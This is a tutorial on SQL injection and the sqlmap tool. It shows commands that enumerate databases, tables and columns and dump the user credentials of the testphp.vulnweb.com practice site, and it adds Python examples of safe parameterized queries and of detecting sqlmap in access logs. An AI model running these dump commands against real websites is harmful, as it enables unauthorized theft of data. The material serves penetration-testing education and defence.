Kali Linux tools (SQLmap)

What is SQL injection (SQLi)?

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application’s content or behavior.

In some situations, an attacker can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure, or perform a denial-of-service attack.

What is SQLmap?

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the experienced penetration tester, and a broad range of switches ranging from database fingerprinting, through fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Where can we use sqlmap?

If you observe a web URL of the form http://testphp.vulnweb.com/listproducts.php?cat=1, where cat=1 is the GET parameter, then the website may be vulnerable to this mode of SQL injection, and an attacker may be able to gain access to information in the database. Furthermore, sqlmap works against PHP-based sites such as this one.

A simple test to check whether your website is vulnerable would be to replace the value of the GET request parameter with an asterisk (*). For example,

http://testphp.vulnweb.com/listproducts.php?cat=*

If this results in a database error (such as a SQL syntax error shown on the page), then we can conclusively say that the website is vulnerable.
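To make the vulnerable pattern behind a listproducts.php?cat=1 style page concrete, here is an added example (not code from this article and not sqlmap code) that puts a string-concatenated query next to its parameterized, type-checked replacement, using an in-memory SQLite table with constructed sample rows. The vulnerable version returns every product for a tainted value and raises a database error for the asterisk probe described above, which is exactly the error the asterisk test looks for; the hardened version rejects both inputs before they reach the database. The function and table names are the example's own assumptions.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build an in-memory products table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, 1, "poster"), (2, 1, "mug"), (3, 2, "shirt"), (4, 3, "hat")],
    )
    return conn


def vulnerable_products(conn: sqlite3.Connection, cat: str) -> list:
    """Vulnerable pattern: the raw GET value is pasted into the SQL text,
    so the database parses whatever the client put in ?cat=."""
    sql = "SELECT name FROM products WHERE cat = " + cat + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def safe_products(conn: sqlite3.Connection, cat: str) -> list:
    """Hardened pattern: enforce the expected type, then bind the value as a
    query parameter so it can only ever be data, never SQL."""
    cat_id = int(cat)  # raises ValueError for "*", "1 OR 1=1", etc.
    rows = conn.execute(
        "SELECT name FROM products WHERE cat = ? ORDER BY id", (cat_id,)
    )
    return [row[0] for row in rows]


def run_probe(func, conn: sqlite3.Connection, value: str):
    """Call one of the two query functions and report what the client sees."""
    try:
        return func(conn, value)
    except ValueError:
        return "rejected before reaching the database"
    except sqlite3.Error as exc:
        # The vulnerable version leaks a database error for the "*" probe,
        # which is the signal the asterisk test in the article relies on.
        return "database error: " + str(exc)


def demo() -> dict:
    """Run the three probe values against both query styles (constructed inputs)."""
    conn = make_db()
    probes = {"normal": "1", "tainted": "1 OR 1=1", "asterisk": "*"}
    return {
        f"{kind}_{name}": run_probe(func, conn, value)
        for kind, func in (("vulnerable", vulnerable_products), ("safe", safe_products))
        for name, value in probes.items()
    }


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label:20} -> {outcome}")
```

The point of the hardened version is that it does two independent things: the int() conversion rejects anything that is not a category id, and the bound parameter means that even a value which passes validation is handed to the database as data rather than spliced into the statement text.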

Installing SQLmap

SQLmap comes pre-installed with Kali Linux, which is the preferred choice of most penetration testers. However, you can install sqlmap on other Debian-based Linux systems using the command

sudo apt-get install sqlmap

Usage

In this article, we will make use of a website that is designed with vulnerabilities for demonstration purposes:

http://testphp.vulnweb.com/listproducts.php?cat=1

As you can see, there is a GET request parameter (cat=1) whose value can be changed by the user. So this website might be vulnerable to SQL injection of this kind.

To test for this, we use sqlmap. To look at the set of parameters that can be passed, type in the terminal:

sqlmap -h

Using SQLMAP to test a website for SQL Injection vulnerability: 

Step 1: check that the website is vulnerable to SQL injection

First, we pass the web URL that we want to check along with the -u parameter. We may also use the --tor parameter if we wish to route the test through the Tor proxy network.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

If sqlmap reports that the parameter is injectable (for example, via an error-based technique), we have found an SQL injection vulnerability.

Step 2: list the databases

Now, typically, we would want to test whether it is possible to gain access to a database. We use the --dbs option to do so; --dbs lists all the available databases.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

(Screenshot: available databases)

We get output showing us that there are two available databases. Sometimes, sqlmap will tell you that it has identified the database type and ask whether you want to test for other database types; you can go ahead and type 'Y'. Further, it may ask whether you want to test other parameters for vulnerabilities; type 'Y' here as well, as we want to thoroughly test the web application.

We observe that there are two databases, acuart and information_schema.

We will choose one of the two databases and continue testing.

Step 3: list the tables present in a particular database

To try and access any of the databases, we have to slightly modify our command. We now use -D to specify the name of the database that we wish to access, and once we have access to the database, we would want to see whether we can list its tables. For this, we use the --tables option. Let us access the acuart database.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

(Screenshot: the list of available tables)

In the screenshot, we see that 8 tables have been retrieved. So now we definitely know that the website is vulnerable.

Step 4: list the columns of a particular table

If we want to view the columns of a particular table, we can use the following command, in which -T specifies the table name and --columns queries the column names. We will try to access the table 'users'.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

(Screenshot: columns extracted from the users table)

Step 5: dump the data from the columns

Similarly, we can access the information in specific columns by using the following command, where -C specifies one or more column names separated by commas, and --dump retrieves the data.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C name,pass --dump

(Screenshot: dumped data)

From the screenshot, we can see that we have accessed the data from the database. Similarly, on such vulnerable websites, we can explore the databases to extract information.
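From the defending side, the requests sqlmap sends during the steps above leave a recognizable trail in the web server's access log. The following added example (not part of the original article and not sqlmap code) scans constructed Apache combined-format log lines for the bare-asterisk probe, SQL syntax inside a parameter value, and sqlmap's default User-Agent prefix sqlmap/, and notes when such a request also produced a server error, which is the signature of the error-based technique mentioned in step 1. The sample lines, IP addresses and the version text after the User-Agent prefix are constructed; the path and parameter name follow the article's example URL.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines in Apache combined format. The "sqlmap/"
# User-Agent prefix is sqlmap's real default; everything else here is made up.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /listproducts.php?cat=* HTTP/1.1" 500 812 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /listproducts.php?cat=1%20AND%201%3D1 HTTP/1.1" 200 5123 "-" "sqlmap/1.0-dev (https://sqlmap.org)"
203.0.113.9 - - [10/Oct/2023:13:56:02 +0000] "GET /listproducts.php?cat=1%27 HTTP/1.1" 500 812 "-" "sqlmap/1.0-dev (https://sqlmap.org)"
203.0.113.7 - - [10/Oct/2023:13:57:10 +0000] "GET /search.php?q=red+mug HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

# Apache "combined" LogFormat: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# SQL fragments that have no business inside a numeric id parameter such as cat=.
SQLI_PATTERN = re.compile(
    r"""['";]|--|/\*|\b(union|select|sleep|benchmark|waitfor)\b|\b(and|or)\b\s+\S+\s*=""",
    re.IGNORECASE,
)


def parse_line(line: str):
    """Split one combined-format line into fields; decode the query string."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)  # percent-decoded
    rec["status"] = int(rec["status"])
    return rec


def classify(rec: dict) -> list:
    """Return the list of reasons a request looks like an injection probe."""
    reasons = []
    if rec["ua"].startswith("sqlmap/"):
        reasons.append("sqlmap default User-Agent")
    for name, value in rec["params"]:
        if value.strip() == "*":
            reasons.append(f"bare asterisk probe in parameter {name!r}")
        elif SQLI_PATTERN.search(value):
            reasons.append(f"SQL syntax in parameter {name!r}: {value!r}")
    # A suspicious value followed by a 5xx is the error-based pattern: the
    # injected text reached the database and the error came back to the client.
    if reasons and rec["status"] >= 500:
        reasons.append("server error in response (possible error-based leakage)")
    return reasons


def scan(log_text: str) -> list:
    """Scan a block of log text and collect the flagged requests."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits.append({"ip": rec["ip"], "path": rec["path"],
                         "status": rec["status"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["path"], hit["status"], "; ".join(hit["reasons"]))
```

The User-Agent match is the weakest of the three signals, since a client can send any string it likes; the parameter checks carry the weight, and the combination of a suspicious value with a 5xx response is the one worth paging on, because it means the application is echoing database errors to clients, which is the condition the asterisk test exploits.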
